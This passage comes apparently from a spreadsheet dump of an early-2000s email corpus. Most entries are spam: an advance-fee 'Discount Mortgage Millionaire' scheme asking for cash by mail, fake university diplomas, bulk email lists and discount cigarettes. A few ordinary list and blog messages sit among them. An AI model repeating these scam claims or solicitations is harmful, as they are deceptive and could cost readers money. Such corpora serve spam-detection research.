 &lt;p&gt;
 &lt;FONT COLOR ="#008000"&gt;&lt;H4&gt;&lt;STRONG&gt;For example, if we made $10,000, you'll get 10% = $1000. &lt;BR&gt;
 Therefore if we do 10 deals in a month, you will take in an &lt;BR&gt;
 easy 10 x $1000  = $10,000!!! &lt;/FONT&gt;&lt;/H4&gt;&lt;/STRONG&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H4&gt;Rake in Big Cash without any  hard work, or large investment &lt;BR&gt;or special training! &lt;/H4&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt; We'll give you all the resources needed to make the contacts, including &lt;BR&gt;
 the sales letter, the e-mail letter, the forms, and the phone script! &lt;/H5&gt;&lt;/FONT&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H2&gt; The Real Estate Market&lt;/H2&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt; One of the primary human needs is Security. Shelter. Home. House.
 &lt;p&gt;
 Wherever you go, there are homes, houses and buildings!&lt;BR&gt;
 Therefore Real Estate Market is  huge! More than $500 billion &lt;BR&gt;
 in Usa alone!!!
 &lt;p&gt;
 That is why opportunities to create vast wealth is always available!!!&lt;BR&gt;
 &lt;P&gt;
 You may have heard that more than 56% of millionaires in Usa&lt;BR&gt;
 (and probably in other countries also)  created their wealth through&lt;BR&gt;
 Real Estate investments!
 &lt;p&gt;
 Well, that is half the truth! &lt;/H5&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#008000"&gt;&lt;H3&gt;&lt;STRONG&gt;You Must know Millionaires "Jealously Guarded &lt;BR&gt;
 Real Estate Secrets, Before You May Succeed"!!! &lt;/FONT&gt;&lt;/H3&gt;&lt;/STRONG&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt; The way to create vast Wealth in Real Estate is Not by buying Real&lt;BR&gt;
 Estate and holding it until it appreciates in value, then you sell it.
 &lt;p&gt;
 That is the hard way. You'll be bogged down by cash flow crunch&lt;BR&gt;
 and all the hassles with tenants and maintenance.
 &lt;p&gt;
 That is what the majority of Real Estate investors do. &lt;BR&gt;
 It is Not fun, and it can frustrate and  wear you thin! &lt;/H5&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H2&gt; Discover  The "Millionaires' Secret" Of &lt;BR&gt;
 Creating Vast Wealth Through &lt;BR&gt;
 Real Estate Investments&lt;/H2&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#0000FF"&gt;&lt;H4&gt;&lt;FONT TYPE="ARIEL"&gt;&lt;STRONG&gt; The Smart, Fast, easy and highly profitable way to make &lt;BR&gt;
 Millions in Real Estate is to buy and  sell  Discounted &lt;BR&gt;
 Mortgages, Real Estate Notes and Trust Deeds&lt;BR&gt; 
 from homeowners! &lt;/FONT&gt;&lt;/H4&gt;&lt;/STRONG&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt;  That is why we need you! By joining us, you'll help us&lt;BR&gt;
 contact homeowners in your city, and we and our associates will invest &lt;BR&gt;
 in them, and do all the work,  while you get paid about 10% of the deal (or&lt;BR&gt;
 $1000/deal), without doing any hard work or large investment! &lt;/H5&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H2&gt; How To Apply: &lt;/H2&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#0000FF"&gt;&lt;H3&gt;&lt;FONT TYPE="ARIEL"&gt;&lt;STRONG&gt; This package: "Discount Mortgage Millionaire"&lt;BR&gt;
  (Dmm)  program is almost  "Free" !!! &lt;/FONT&gt;&lt;/H3&gt;&lt;/STRONG&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#008000"&gt;&lt;H3&gt;&lt;STRONG&gt;However, we must ask you to donate a token fee of $10. &lt;BR&gt;(This is voluntary)&lt;/FONT&gt;&lt;/H3&gt;&lt;/STRONG&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt; This is our way to discourage those who are not serious. &lt;BR&gt;Our time is worth a lot of money.
 &lt;p&gt;
 We only want to hear from those who are serious!
 &lt;p&gt;
 If you're interested, please follow the simple steps below to apply. 
 &lt;p&gt;
 Help us make contacts, and we'll spend our money to do the deal, and also &lt;BR&gt;
 compensate you handsomely (10% of whatever amount we make). It is a &lt;BR&gt;
 win-win relationship ! &lt;/H5&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H2&gt; Application Steps: &lt;/H2&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#0000FF"&gt;&lt;H3&gt;&lt;FONT TYPE="ARIEL"&gt; (1)  Write your Name, Address, E-mail address, Phone and fax &lt;BR&gt;
 (if any) on a piece of paper. &lt;/FONT&gt;&lt;/H3&gt;
 &lt;p&gt;
  &lt;FONT COLOR ="#008000"&gt;&lt;H3&gt; Then Write the words: &lt;BR&gt;
 "$10 Donation" for Dmm program. &lt;/FONT&gt;&lt;/H3&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#0000FF"&gt;&lt;H3&gt;&lt;FONT TYPE="ARIEL"&gt; (2) Enclose $10 Usa Dollars  in cash or money order (Usa only) &lt;BR&gt; 
 and send it by Priority mail to the Name and Address below : &lt;BR&gt; 
 (Customers from outside Usa, please buy and send &lt;BR&gt;
 Usa Dollars cash only) &lt;/FONT&gt;&lt;/H3&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H3&gt; Mr. Benney, Ceo&lt;BR&gt;
 (Dmm Package) &lt;BR&gt;
 328 Flatbush Ave., &lt;BR&gt;
 Suite 221&lt;BR&gt;
 Brooklyn, Ny 11238&lt;BR&gt;
 Usa
 &lt;p&gt;
 *******
 &lt;p&gt;
 Phone: (718) 595 0529 &lt;BR&gt;
 (Please Mention "Dmm Program, Code B") &lt;/H3&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#0000FF"&gt;&lt;H3&gt;&lt;FONT TYPE="ARIEL"&gt; (3) After sending the "Donation", send an e-mail and notify &lt;BR&gt;
 us that you have sent it. &lt;/FONT&gt;&lt;/H3&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt; &lt;H3&gt; Include your full Name, and Phone. 
 &lt;P&gt;
 And put these words in the subject space: 
 &lt;p&gt;
 "Donation Sent for Dmm program, Code B"&lt;/H3&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#0000FF"&gt;&lt;H3&gt;&lt;FONT TYPE="ARIEL"&gt;Please Send the e-mail notice  to: &lt;/FONT&gt;&lt;/H3&gt;&lt;BR&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H3&gt; polsew246@btamail.net.cn &lt;/H3&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H2&gt; (4) What You Shall Receive: &lt;/H2&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#008000"&gt;&lt;H3&gt;(a) You'll receive the "Discount Mortgage Millionaire"  &lt;BR&gt;
 Dmm package, which  gives you all the details on how this&lt;BR&gt; 
 cash program works, including  all the resources you need &lt;BR&gt;
 to make contacts for us.
 &lt;p&gt;
 When you order "Dmm eBook", you will have two choices:
 &lt;p&gt;
 (a) You can use our Real Estate Millionaire Cash Secret&lt;BR&gt; 
 (Dmm ebook) to find the deals, do them yourself and&lt;BR&gt; 
 keep all the money!&lt;BR&gt;
 Or&lt;BR&gt;
 (b) You can apply and become our Associate Mortgage&lt;BR&gt; 
 Agent (Ama) and participate in our Millionaire&lt;BR&gt; 
 "Real Estate Acquisition Plan" (Reap)!
 &lt;p&gt;
 (b) You'll also receive Free details on how to obtain&lt;BR&gt; 
 another powerful program that we have: &lt;/FONT&gt;&lt;/H3&gt;&lt;BR&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H3&gt; "Quick Cash Secret Banking System, &lt;BR&gt;
 The Royal Road To Riches", (Qcsbs-rrr) &lt;/H3&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#008000"&gt;&lt;H3&gt;You'll discover the jealously guarded 2000 yrs old &lt;BR&gt;
 millionaire cash secret  little known to the general public. 
 &lt;p&gt;
 All you do is go to the "Secret Website" on the internet, &lt;BR&gt;
 we shall reveal, open a "special bank account", then &lt;BR&gt;
 click your mouse and enter a "Secret Code Number". 
 &lt;p&gt;
 Then click your mouse again, and you'll start making &lt;BR&gt;
 money! It takes only  minutes to do, and you can &lt;BR&gt;
 rake in $1,500/wk from this!!! 
 &lt;p&gt;
 100% legal and valid in all countries of the world. &lt;BR&gt;
 No hard work or special training or scam or &lt;BR&gt;
 large investment! &lt;/FONT&gt;&lt;/H3&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt; &lt;H5&gt; When you order the "Dmm package", you'll get all the &lt;BR&gt;
 details about this  "Qcsbs-rrr" also, and we'll help you learn&lt;BR&gt; 
 and also start using it to create  true wealth and success!
 &lt;P&gt;
 Qcsbs Millionaire Cash System is the Fastest  and Greatest way &lt;BR&gt;
 to make money on earth!!!
 &lt;p&gt;
 That  is how we obtained the money we want to spend in Real&lt;BR&gt; 
 Estate investments!
 &lt;p&gt;
 When you get Qcsbs, it will also help you to create powerful&lt;BR&gt;
 cash flow to acquire Real Estate and other assets fast!!!
 &lt;p&gt;
 When we get your "donation", we shall send you an e-mail &lt;BR&gt;
 to download this Dmm ebook from our storage site on the &lt;BR&gt;
 internet. So be sure your e-mail address is valid, and you &lt;BR&gt;
 notify us by e-mail after you send the $10 donation. 
 &lt;p&gt;
 Please allow at least 2 weeks, after you send the donation&lt;BR&gt;
 so we may receive it. When we receive it, we'll send an e-mail &lt;BR&gt;
 to you to download the "Dmm eBook".&lt;BR&gt;
 &lt;P&gt;
 We look forward to working with you, to help you begin to&lt;BR&gt;
 acquire  Real Estate and Cash flow, without any headaches&lt;BR&gt;
 hassles, or large investments!!!
 &lt;p&gt;
 Your time to stay at home and make money in Real Estate deals&lt;BR&gt;
 has come, so answer this special invitation today!!!
 &lt;p&gt;
 Thank you!
 &lt;p&gt;
 Mwc Investments,  International (A Div. of Mwc) &lt;/H5&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H2&gt; Deadline To Apply: &lt;/H2&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H4&gt; This offer is valid for 1 week only.
 &lt;p&gt;
 Please apply within 1 week of getting this e-mail. &lt;BR&gt;
 If you fail, you may Not be accepted!
 &lt;p&gt;
 Therefore print this e-mail now!&lt;BR&gt;
 Then Read it many times to understand and agree&lt;BR&gt;
 to our offer and then place an order now!
 &lt;p&gt;
 You may get this e-mail only once. &lt;BR&gt;
 So, hurry to avoid missing this fabulous &lt;BR&gt;
 One-In-A-lifetime Real Estate, Easy, Fast Cash Opportunity! 
 &lt;p&gt;
 Start today!  In  less than a year, you may be worth&lt;BR&gt;
 about $1,000,000!!! Come and join us now!!!
 &lt;/H4&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H4&gt; Unsubscribe Info: &lt;/H4&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt; This e-mail is Not intended for Washington State residents, and any&lt;BR&gt;
 other anti-internet commerce state. 
 &lt;p&gt;
 If you're from any of these states, please delete this e-mail and don't respond. &lt;BR&gt;
 This offer is void wherever prohibited by law.
 &lt;p&gt;
 Your  name is not in our database, therefore you may Not get another&lt;BR&gt;
  e-mail from us! 
 &lt;p&gt;
 Our remove address is:
 removeme@easy.com
 &lt;p&gt;
 =============================End====================================
 &lt;/H5&gt;&lt;/FONT&gt;
 &lt;HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Thanks to Jenny for the pointer to this Yale Law article about
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:6:48:40AM
 Date: Wed, 25 Sep 2002 13:48:40 GMT
 Thanks to Jenny[1] for the pointer to this Yale Law article[2] about The 
 Wayback Machine removing articles about Scientology. "While Lawmeme doesn't 
 know all the details of Scientology's request to the Internet Archive, 
 especially the extent of websites removed, we do know that the Internet Archive 
 is blocking all archived versions of one of Scientology's leading critics and 
 the main target in the Google Affair, Xenu.net."
 [1] http://www.theshiftedlibrarian.com/2002/09/24.html#a2837
 [2] http://research.yale.edu/lawmeme/modules.php?name=News&amp;file=article&amp;sid=350
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EIN News - FREE Trial
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,
 My name is Petr Stanek and I am managing the free trial 
 subscription program at the European Internet Network (EIN).  
 EIN publishes hourly updated breaking news headlines and other 
 important information from 200 countries and regions. 
 During September, you and your associates can have a 
 FREE TRIAL SUBSCRIPTION to the EIN DELUXE Edition.
 You will have access to a collection of 25,000 daily 
 updated articles, a news archive and many other benefits too. 
 Once again, this trial is FREE. 
 To subscribe, just reply to this e-mail or sign up at: 
 http://www.europeaninternet.com/login/affiliate_register.php3 
 A partial list of current EIN subscribers can be found at:  
 http://www.europeaninternet.com/mediakit/
 If you have any questions, comments, or need assistance  
 signing up, please contact us personally by either writing to 
 helpdesk@europeaninternet.com or simply replying to this email. 
 Please feel free to forward this offer to any of your colleagues. 
 Best regards,
 Petr Stanek
 Subscription Department
 EIN News
 http://www.einnews.com
 To be removed please reply to: remove@europeaninternet.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Sir or Madam
 In the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise!  We will be only too happy to take you off our mailing list.
 If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer  by clicking on this link.
 http://www.smokersunited.co.uk/?S=24&amp;ID=2
 We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing.  Why pay more?
 To remove yourself from our mailing list, please click below
 mailto:smokersclub@terra.es
 Yours faithfully.
 Smokers United
 http://www.smokersunited.co.uk/?S=24&amp;ID=2
 xay1y
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt;                                                ... webforms /can/
 &gt; &gt; accept "U.S. of A" as a country.  Incredible, but true.  Web forms can
 &gt; &gt; also accept /multiple/ or even /free-form/ telephone numbers ...
 Are the people who use procrustean web
 forms practices the same ones who don't
 accept faxes?
 When I *really* need to get something
 done, instead of just idle surfing, I
 call or fax.  Faxing, like a web form,
 can be done 24x7; it allows me to give
 all the (and only the) pertinent info
 in a single place; it also provides a
 self-journalled correspondence, which
 means rollback is easy and replay is
 even easier.
 -Dave
 &gt;           Sure, tiled windows were the best we had for
 &gt; a brief period of time, but they are completely useless
 &gt; except for some terminal based replacement applications. 
 I've been running a tiled (but somewhat
 overlapped, yielding a horizontal stack)
 window manager lately.  Like filling in
 a web form, finding edges and shuffling
 windows may seem productive, but I find
 that having a window manager manage the
 windows means I can concentrate on what
 I want to do with their contents.
 :::::::::
 "dumb question: X client behind a firewall?"
 &gt; Back in my day, they didn't have ssh. Then again, back in my day,
 &gt; they didn't have firewalls.
 Back in my day, when one changed computer
 installations, email would be forwarded
 as a courtesy.
 Now, we seem to have swung so far in the
 opposite direction that it makes sense to
 ditch addresses every couple of years to
 shed spam.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: University Diplomas
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;body&gt;&lt;center&gt;
 &lt;table bgcolor=3D"0080C0" border=3D"0" width=3D"999" cellspacing=3D"0" cel=
 lpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"1" width=3D"999"&gt; &lt;hr&gt;&lt;font color=3D"yellow"&gt;&lt;b&gt;&lt;center=
 &gt;&lt;br&gt;&lt;br&gt;&lt;font size=3D"5"&gt;
 &lt;font size=3D"7"&gt;Finally! &lt;font size=3D"7"&gt;&lt;br&gt;&lt;br&gt;
 You've waited a long time for this!&lt;br&gt;&lt;br&gt;
 Obtain Your &lt;b&gt;  University Diploma!&lt;/b&gt;&lt;br&gt; (Phd, MBA, ect) &lt;br&gt;&lt;br&gt;
 &lt;font size=3D"5"&gt;
 Here is how to receive your University Diploma.&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;
 &lt;b&gt;1 - 6 4 6 - 2 1 8 - 1 2 0 0    &lt;br&gt;Call Us ANYTIME!&lt;/b&gt; 
 &lt;br&gt;&lt;br&gt;
 &lt;font size=3D"5"&gt;
 Whether it's a Phd or an MBA, &lt;br&gt;
 the end result is a Beautiful Diploma on your wall.&lt;br&gt;&lt;br&gt;
 There's nothing like the feeling of getting &lt;br&gt;
 the &lt;i&gt;respect&lt;/i&gt; of your peers and co-workers.&lt;br&gt;&lt;br&gt;
 Some things in life ARE easy. &lt;br&gt;Just pick up the phone and call us today=
 !&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;
 Everyone is eligible! 
 &lt;br&gt;&lt;br&gt;
 &lt;font size=3D"7"&gt;&lt;b&gt;
 &lt;font color=3D"000080"&gt;&lt;br&gt;&lt;center&gt;
 &lt;i&gt;1 - 6 4 6 - 2 1 8 - 1 2 0 0 &lt;/i&gt;&lt;br&gt; 
 &lt;br&gt; 
 &lt;font size=3D"6"&gt;&lt;b&gt;
 Call 24 hours a day, 7 days a week, &lt;br&gt;
 including Sundays and holidays. &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"4"&gt;
 For Removal mailto:no_degree_xyz@excite.com&lt;br&gt;&lt;br&gt;
  &lt;hr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Ray Wallace
</t>
  </si>
  <si>
    <t xml:space="preserve">Ray Wallace passed away on November 26, 2002, at Toledo, Washington.
 Details to follow.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reach millions on the internet!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Consumers, Increase your Business Sales!  How?? By 
 targeting millions of buyers via e-mail !! 
 15 MILLION EMAILS  + Bulk Mailing Software For Only $100.00
                             super low price! ACT NOW !!!
 Our Fresh Addresses Will Bring You 
 Incredible Results!
 If you REALLY want to get the word out regarding
 your services or products, Bulk Email is the BEST 
 way to do so, PERIOD! Advertising in newsgroups is 
 good but you're competing with hundreds even THOUSANDS
 of other ads. Will your customer's see YOUR ad in the 
 midst of all the others?
 Free Classifieds?  (Don't work)
 Web Site?          (Takes thousands of visitors)
 Banners?           (Expensive and iffy)
 E-Zine?            (They better have a huge list)
 Search Engines?    (Easily buried with thousands of others)
 Bulk Email will allow you to DIRECTLY contact your
 potential customers. They are much more likely to
 take the time to read about what you have to offer 
 if it was as easy as reading it via email rather
 than searching through countless postings in 
 newsgroups.
 The list's are divided into groups and are compressed. 
 This will allow you to use the names right off the cd. 
 ORDER IN THE NEXT 72 hours AND RECEIVE 4 BONUSES!!   
 *BONUS #1 Receive an additional cd-rom with millions of fresh, 
 deliverable general internet e-mail addresses free!! 
 *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom with
 reprint resale rights! Produce for pennies and resell for BIG dollars! 
 *BONUS #3 Receive the Mass Mailer bulk delivery software, with full
 operating instructions. This software will get the mail out QUICK! 
 *BONUS #4 Receive the Informational Guide to bulk e-mail. This guide 
 will give you all the information you need to get started! 
 THIS IS A ONE TIME PACKAGE DEAL WORTH HUNDREDS OF DOLLARS!!   
 ACT NOW! THIS IS A LIMITED TIME OFFER! ORDER WHILE SUPPLIES LAST! 
 RECEIVE THIS DREAM PACKAGE FOR THE UNBELIEVABLE LOW, LOW  PRICE OF  
 ONLY $100.00
                    ORDERING INFORMATION:
 Send check are money order to:
 SELLERS COMMUNICATIONS
 2714 WEST 5th
 North Platte, Ne 69101
 U.S.A.
         CHECK BY FAX SERVICES OR CREDIT CARO INFO: 
 O R D E R   N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-534-2098  Are fax your order to 1-208-975-0773
 This Number is for credit Card Orders Only!!!
             CHECK BY FAX SERVICES!
 __________________________________________
 To order, via credit card simply cut/paste and print out the
 EZ ORDER FORM below and fax to our office today.
           ***** NOW ONLY $100! *****
 This "Special Price" is in effect for the next seven days,
 after that we go back to our regular price of $250.00 ...
 Don't delay... you can be in business tomorrow!  
 We accept Visa, Mastercard, Amex, Disc and Checks by Fax.
 ----------------------Cut &amp; Paste----------------------
 ---------------------EZ Order Form---------------------
 _____Yes! I want everything!  I am ordering within 72 hours.
 Include my FREE "Business On A Disk" bonus along with your 
 Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)
 for the special price of only $100.00 + shipping as indicated
 below.
 _____Yes!  I missed the 72 hour special, but I am ordering
 CD WITH, super clean e-mail addresses within 7 days for the
 "special" price of only $250.00 + s&amp;h.
 _____Oop's I missed the 72 hour and 7 day "specials".  I am
 ordering The Cd  at the regular price of $250.00 + s&amp;h.
      ***PLEASE SELECT YOUR SHIPPING OPTION***
 ____I would like to receive my package FedEx OVERNIGHT. I am
 including $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,
 all other International add an *additional* $25 [$40 total] for shipping)
 ____I would like to receive my package FedEx 2 DAY delivery.
 I'm including $10 for shipping. (Sorry no Canada or International
 delivery - Continental U.S. shipping addresses only)
                   ***Please Print Carefully***
 NOTE:  Orders cannot be shipped without complete information
 including your signature.  No exceptions!
 NAME____________________________________________________
 COMPANY NAME____________________________________________
 ADDRESS_________________________________________________
 (FedEx can only ship to street addresses - no P.O. boxes)
 CITY, STATE, ZIP________________________________________
 PHONE NUMBER____________________________________________
 (required for shipping &amp; tracking) 
 EMAIL ADDRESS___________________________________________
 (Print Carefully - required in case we have a question and to
 send you a confirmation that your order has been shipped and for 
  technical support if you order within 24 hrs) 
 TYPE OF CREDIT CARD:
 ______VISA _____MASTERCARD  ______AMEX ______DISC
 CREDIT CARD# __________________________________________
 EXPIRATION DATE________________________________________
 NAME ON CARD___________________________________________
 TOTAL AMOUNT (Including Shipping): $___________________
 DATE:x__________________
 (Required) SIGNATURE:x_________________________________
 I understand that I am purchasing the e-mail address on CD,
 and authorize the above charge to my credit card, the addresses are not rented, 
 but are mine to use for my own mailing, over-and-over.  Free bonuses are included, 
 but cannot be considered part of the financial transaction.  I understand that it 
 is my responsibility to comply with any laws applicable to my local area.  As with 
 all software, once opened the CD may not be returned, however, if found defective 
 it will be replaced with like product at no charge.
 O R D E R   N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
  1-308-534-2098  Are fax your order to 1-208-975-0773  
 This Number is for credit Card Orders Only!!!
             CHECK BY FAX SERVICES!
 If you would like to fax a check, paste your check below and fax it to our office 
 along with the EZ Order Form forms to: 1-520-244-5912
 **********************************************************
     ***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
  CHECK HERE AND FAX IT TO US AT   1-208-975-0773
 **********************************************************
 If You fax a check, there is no need for you to mail the
 original.  We will draft a new check, with the exact
 information from your original check. All checks will be
 held for bank clearance. (7-10 days) Make payable to: 
 "SELLERS COMMUNICATIONS"
 -=-=-=-=--=-=-=-=-=-=-=Remove Instructions=-=-=-=-=-=-=-=-=-=-=-=
 **************************************************************
 Do not reply to this message - 
 To be removed from future mailings:
 mailto:nomore2001@asean-mail.com?Subject=Remove
 **************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;head&gt;&lt;/head&gt;&lt;body bgcolor="#FFFFFF"&gt;&lt;table width="760" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;table width="775" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td valign="top" height="440" width="504"&gt; 
       &lt;table width="509" border="0" align="center" cellpadding="0" cellspacing="0"&gt;
         &lt;tr&gt; 
           &lt;td&gt;
             &lt;div align="center"&gt; 
               &lt;table width="500" border="0" cellpadding="0" cellspacing="0"&gt;
   &lt;tr&gt; 
                   &lt;td colspan="4"&gt;&lt;div align="center"&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;font size="4" color="#FF0000"&gt;&lt;b&gt;Unleash 
                       your PC's Multimedia power TODAY!&lt;br&gt;
                       &lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
                   &lt;td width="156"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_01.gif" width="156" height="164" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                   &lt;td width="92"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_02.jpg" width="92" height="164" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                   &lt;td width="139"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_03.gif" width="139" height="78" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_05.jpg" width="139" height="86" border="0"&gt;&lt;/a&gt;&lt;/td&gt;              &lt;td width="113"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_04.gif" width="113" height="164" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
                   &lt;td rowspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_06.gif" width="156" height="156" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                   &lt;td rowspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_07.gif" width="92" height="84" border="0"&gt;&lt;/a&gt;&lt;br&gt;
                     &lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_10.jpg" width="92" height="72" border="0"&gt;&lt;/a&gt;&lt;/td&gt;              &lt;td height="84" colspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_08.jpg" width="139" height="84" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_09.gif" width="113" height="84" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
